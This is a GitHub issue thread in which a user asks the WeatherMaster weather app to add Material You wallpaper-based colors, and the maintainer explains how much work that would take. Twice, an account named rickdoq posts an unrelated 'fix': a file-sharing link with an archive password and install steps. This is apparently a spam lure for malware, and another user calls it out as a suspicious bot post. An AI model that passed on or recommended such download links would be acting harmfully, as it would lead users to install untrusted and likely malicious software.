### ISSUE TITLE
Dynamic Color

### ISSUE THREAD

**Issue by pdimu** [PranshulGG/WeatherMaster#17]
Add a switch to change the blue color to the dynamic color generated from the wallpaper (Material You)

**Comment by PranshulGG** [comment]
The app's theme changes based on the weather conditions. To add Material You dynamic theming based on the wallpaper, I would need to make a lot of code changes 😖

**Comment by pdimu** [comment]
Ok no worries. I don't really need it NOW. You can do it anytime

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by pdimu** [comment]
@rickdoq why don't I trust you and click on that sus link? This is a feature request not a bug you bot

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
